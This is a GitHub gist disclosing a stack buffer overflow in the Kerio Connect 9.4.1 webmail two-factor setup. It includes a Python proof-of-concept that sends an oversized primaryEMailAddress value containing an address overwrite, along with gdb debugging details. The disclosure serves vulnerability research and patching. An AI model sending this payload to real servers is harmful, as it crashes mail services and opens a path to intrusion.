Skip to content

Instantly share code, notes, and snippets.

@Frycos
Created January 31, 2023 07:57
Show Gist options
  • Save Frycos/62fa664bacd19a85235be19c6e4d7599 to your computer and use it in GitHub Desktop.
Save Frycos/62fa664bacd19a85235be19c6e4d7599 to your computer and use it in GitHub Desktop.

Kerio Connect - Stack Buffer Overflow in 2FASetup

@Frycos
Copy link
Author

Frycos commented Jan 31, 2023

Introduction

The latest version 9.4.1 patch 1 (6445) of the software Kerio Connect is prone to a Stack Buffer Overflow located in the webmail component 2FASetup function. This attack could be conducted by any unprivileged authenticated webmail user.

kerio1

Details

The function bool kerio::mailserver::dataSwitch::TwoFAPolicyManSwitch::doSubmitDomainUserTwoFA(basic_string *param_1,basic_string,*param_2,basic_string *param_3,basic_string *param_4,ulong param_5,int *param_6,short *param_7,short,*param_8,bool param_9,basic_string *param_10) makes use of an unsafe strcpy(dest,src) call with user-controlled input.

kerio2

The destination buffer is defined with a fixed size char local_1c3 [128] and gets filled with the user-controlled param_4 buffer as source. Tracing back the input goes to the function kerio::mailserver::dataSwitch::TwoFAPolicyManSwitch::submitTwoFA (basic_string *param_1,basic_string *param_2,basic_string *param_3,int *param_4,short *param_5,basic_string *param_6,int *param_7) with param_3. The same parameter name comes from the caller kerio::mailserver::facades::webmail::SessionManFacade::submitUserTwoFA(SessionManFacade *this,TwoFAAuthenticationStatus *param_1,short *param_2,basic_string *param_3,basic_string *param_4,basic_string *param_5).

The code is called by triggering the 2FASetup in the webmail application running on TCP port 80 as normal user, i.e. no administrative permissions are needed. The 2FASetup is seen commonly enabled to further secure the login procedure against threat actors trying to get access to a mailbox if credentials were leaked.

kerio3

When the user starts the 2FASetup

kerio4
kerio5

a request to the server with the parameters token and primaryEMailAddress is sent.

kerio6

This request gets processed by the vulnerable code path mentioned above.

Proof-of-concept Exploitation

To prove that the vulnerable strcpy indeed is filled by user-controlled data from these parameters, a proof-of-concept exploit in Python script was written.

import requests
import sys

if(len(sys.argv) < 3):
	print("usage: python poc.py <SESSION_CONNECT_WEBMAIL> <TOKEN_CONNECT_WEBMAIL>(=<X-Token>)")
	sys.exit()

session = requests.session()

burp0_url = "http://localhost:80/webmail/api/jsonrpc/"
burp0_cookies = {"SESSION_CONNECT_WEBMAIL": sys.argv[1], "TOKEN_CONNECT_WEBMAIL": sys.argv[2]}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0", "Accept": "application/json-rpc", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Token": sys.argv[2], "X-Requested-With": "XMLHttpRequest", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/webmail/", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"}
nicestring = '\xb2\x5f\xa3\x02' #02a35fb2
shell = "A"*383 + nicestring + "B"*100
payload = '{\"id\": 16, \"jsonrpc\": \"2.0\", \"method\": \"Session.submitUserTwoFA\", \"params\": {\"primaryEMailAddress\": ' + '\"' +  shell + '\"' + ', "token": "123456"}}'
session.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=payload)
print("Payload send...")

The GNU debugger gdb (with gef extension) is used to debug the running binary /opt/kerio/mailserver/mailserver /opt/kerio/mailserver. A breakpoint at the vulnerable strcpy call is made at 0x0130f947.

Then the Python script with the cookie values fed into the parameters is called poc_sent.py 662a37f6e6fd2ed91307b8ce13998111ccf3a1b653b0cf58b22eaab8967f1103 a1d4229ded44eb257a58a4a99b3437ee0f1a19a563828c8ab9158ae0112b88db.

The breakpoint indeed is hit.

kerio7

Due to the stack buffer overflow overwriting several other stack variables, the mailserver binary crashes and is (or has to be) restarted.

kerio8

Patch

Version 10.0.0 fixed this issue properly.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment